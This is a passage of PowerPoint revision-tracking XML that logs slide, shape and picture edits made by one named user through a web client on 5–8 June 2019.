          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:45:11.627" v="1441" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="12" creationId="{74426567-B002-4639-AEC8-05955BE51CF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:42:53.690" v="1369" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="4" creationId="{046BA0F5-626E-4763-96C3-ACD9923FB11D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:42:36.408" v="1365"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="6" creationId="{4FCDD262-2B46-4696-8B6E-DC303E4D50DA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:44:12.424" v="1417" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="8" creationId="{5E921C77-D729-4A41-B27B-4CC266801589}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:44:37.940" v="1421" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="11" creationId="{526816A3-051F-4BFF-835C-18719C8FE247}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:06:59.426" v="1733" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2424753208" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:57:27.047" v="1688" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="2" creationId="{56408B81-C44F-406A-80B8-27F6857AF5E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:06:11.129" v="1695"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="5" creationId="{ADE71A40-4AFF-41DA-AB27-31FED0BF771F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:06:56.411" v="1732" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="8" creationId="{E5E53988-9E9F-474E-A554-F7132030E8C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:06:07.457" v="1694"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="9" creationId="{FACF7405-240D-4555-A361-C4D79B5248B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:06:59.426" v="1733" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:picMk id="6" creationId="{CE12BD29-D35F-4EAD-904B-825F25B1CF87}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:06.990" v="2200"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3283856840" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:39:24.720" v="1345" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="2" creationId="{D2F8359D-6713-414D-8458-C12B7B84A5EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:45:35.659" v="1445"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="3" creationId="{1661CF4A-C624-47EB-8406-2BD8512A22EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:45:35.659" v="1444"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:picMk id="5" creationId="{B70B4DFC-ADA5-452E-BD06-93D0E121CDE8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:42:58.411" v="2199"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2376567192" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:55:22.761" v="1611" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2286379206" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:52:26.901" v="1586" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2286379206" sldId="277"/>
            <ac:spMk id="2" creationId="{A10F30EF-45FA-40D9-9B81-DEDA7848E1DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:52:32.980" v="1589"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2286379206" sldId="277"/>
            <ac:spMk id="3" creationId="{1E8BB65D-770C-4A36-808F-CC72382F0A5D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:54:20.464" v="1603" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2286379206" sldId="277"/>
            <ac:spMk id="6" creationId="{09CCCEF5-D405-4829-A261-A70E2E0007A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:53:08.917" v="1594" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2286379206" sldId="277"/>
            <ac:picMk id="4" creationId="{0913270A-28F2-4EEE-B49B-1773B245029B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:55:22.761" v="1611" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2286379206" sldId="277"/>
            <ac:cxnSpMk id="7" creationId="{C9C07DDA-D70B-4995-AF04-E67B4D22CB99}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:50:50.729" v="1555"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4092184199" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:50:19.557" v="1549" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4092184199" sldId="277"/>
            <ac:spMk id="2" creationId="{2E4C100C-D911-4AD3-B379-43F688F73B7F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:20:14.953" v="1911" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="60245793" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:56:14.015" v="1619" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="60245793" sldId="278"/>
            <ac:spMk id="2" creationId="{21BF9439-5A78-4DB0-A20C-1F94D5F5E9CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:56:18.110" v="1622"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="60245793" sldId="278"/>
            <ac:spMk id="3" creationId="{92698113-E465-4F38-9651-096DFADE2464}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:20:14.953" v="1911" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="60245793" sldId="278"/>
            <ac:spMk id="6" creationId="{89C36E73-9B23-4604-8AFD-5FCC6EF2C7CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:18:01.014" v="1741"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="60245793" sldId="278"/>
            <ac:picMk id="3" creationId="{6D386276-372F-470B-8172-80A726161A9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:27:11.993" v="2000" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3962008518" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:23:14.563" v="1917" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3962008518" sldId="279"/>
            <ac:spMk id="2" creationId="{C1A82B29-7402-44EC-AF2B-E2732385A5BD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:07:17.270" v="1735"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3962008518" sldId="279"/>
            <ac:spMk id="3" creationId="{B04A2FF5-286E-4511-A953-FFFDBFAB915C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:27:11.993" v="2000" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3962008518" sldId="279"/>
            <ac:spMk id="7" creationId="{61638D80-DFDD-426E-8B8C-4113D4E36E72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:25:45.158" v="1973" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3962008518" sldId="279"/>
            <ac:spMk id="8" creationId="{CAA9E09B-548A-4628-8E39-6A32F57C0F78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:22:54.391" v="1916"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3962008518" sldId="279"/>
            <ac:picMk id="4" creationId="{2FF54272-57B2-4D74-B589-CF4B061FDF99}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:41:41.952" v="2190" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1703755838" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:23:32.720" v="1925" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1703755838" sldId="280"/>
            <ac:spMk id="2" creationId="{D7CFE1E7-3BBA-4A4F-AFD3-ECB21A214720}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:23:36.267" v="1928"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1703755838" sldId="280"/>
            <ac:spMk id="3" creationId="{0E030FFE-475B-40F4-8FE3-76F3A384AC08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:41:41.952" v="2190" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1703755838" sldId="280"/>
            <ac:spMk id="4" creationId="{DA99A235-ABF6-4451-9018-393060692DD0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:38:06.825" v="2103" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1703755838" sldId="280"/>
            <ac:spMk id="6" creationId="{B06BEA0C-9ECA-4F27-A43D-B42A0C8E2867}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1B33242D-F405-28D2-9B6E-57252DA0E0A9}"/>
    <pc:docChg chg="addSld delSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1B33242D-F405-28D2-9B6E-57252DA0E0A9}" dt="2019-06-07T14:30:52.806" v="3"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1B33242D-F405-28D2-9B6E-57252DA0E0A9}" dt="2019-06-07T14:30:52.806" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1B33242D-F405-28D2-9B6E-57252DA0E0A9}" dt="2019-06-07T14:30:48.337" v="2"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}" dt="2019-06-07T13:20:11.275" v="16" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}" dt="2019-06-07T13:05:43.710" v="10" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}" dt="2019-06-07T13:05:43.710" v="10" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="4" creationId="{2DDEECF7-AF9E-4EF3-91A3-689445B25498}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}" dt="2019-06-07T13:20:11.275" v="15" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BCA59B8F-DC36-4CB7-8F70-E589501A22F5}" dt="2019-06-07T13:20:11.275" v="15" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="4" creationId="{0F466325-8DB1-47C8-A7D4-280079B59ABB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}"/>
    <pc:docChg chg="addSld modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:44.330" v="660" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:22:30.368" v="609" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="109857222" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:22:30.368" v="609" actId="1076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Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:22:20.059" v="608" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="109857222" sldId="256"/>
            <ac:picMk id="4" creationId="{51E3BFA3-4A39-453B-A431-EEFEA83A9193}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:44.330" v="660" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:24:24.686" v="620" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="2" creationId="{6E15723C-2368-4809-A835-2A53B4CC56DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:30:27.957" v="429" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="3" creationId="{7200B702-4D35-46CE-9CF9-B0946A6D7592}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:16.517" v="657" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
